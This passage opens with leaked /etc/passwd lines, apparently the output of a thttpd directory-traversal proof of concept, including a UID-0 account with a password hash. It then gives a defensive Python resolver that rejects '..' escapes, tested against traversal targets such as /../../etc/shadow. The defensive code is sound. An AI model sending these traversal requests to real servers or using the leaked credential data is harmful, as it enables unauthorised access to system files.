mailman:x:41:41:GNU Mailing List Manager:/var/mailman:/bin/false
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false
pvm:x:24:24::/usr/share/pvm3:/bin/bash
user:$1$DjTSjByw$IQj8EmL4l7b0tLWbUTOrX0:0:0:Linux User,,,:/home/user:/bin/sh
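An added example, not from Metropolis's post and not thttpd's own code: a request-target resolver of the kind a small web server needs, which decodes the path, walks it segment by segment and refuses any `..` that would climb above the document root, run over the two traversal targets from the PoC alongside ordinary requests. `DOCROOT` and the extra targets are constructed.

```python
import posixpath
from urllib.parse import unquote, urlsplit

DOCROOT = "/var/www/htdocs"   # constructed document root

def resolve_request_path(docroot, target):
    """Maps an HTTP request target (the path part of the request line) to a
    file path under docroot. Returns None when the target tries to escape."""
    path = unquote(urlsplit(target).path)   # drop query/fragment, then decode %XX
    if "\x00" in path:
        return None                          # an embedded NUL would truncate a C path
    stack = []
    for segment in path.split("/"):
        if segment in ("", "."):
            continue                         # "//" and "." are no-ops
        if segment == "..":
            if not stack:
                return None                  # ".." with nothing to pop: escape attempt
            stack.pop()
        else:
            stack.append(segment)
    resolved = posixpath.join(docroot, *stack) if stack else docroot
    # belt and braces: the joined result must still lie inside docroot
    if posixpath.commonpath([docroot, resolved]) != docroot:
        return None
    return resolved

def classify(docroot, targets):
    """{target: resolved path or None} for a batch of request targets."""
    return {t: resolve_request_path(docroot, t) for t in targets}

# Constructed request targets, including the two traversal strings from the post.
SAMPLE_TARGETS = [
    "/index.html",
    "/docs/../index.html?x=1",
    "/../../../../../../../../etc/passwd",
    "/../../../../../../../../etc/shadow",
    "/%2e%2e/%2e%2e/etc/passwd",
    "/images//logo.png",
]

if __name__ == "__main__":
    for target, resolved in classify(DOCROOT, SAMPLE_TARGETS).items():
        print("%-40s -> %s" % (target, resolved or "REJECTED"))
```

Rejecting explicitly, rather than normalising the path and silently clamping at the root, is deliberate: a request that tries to climb out of the document root is worth a log line, not a quiet 404. On a real filesystem the last step should also resolve symlinks (`os.path.realpath`) before the containment check, which this offline example cannot do.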
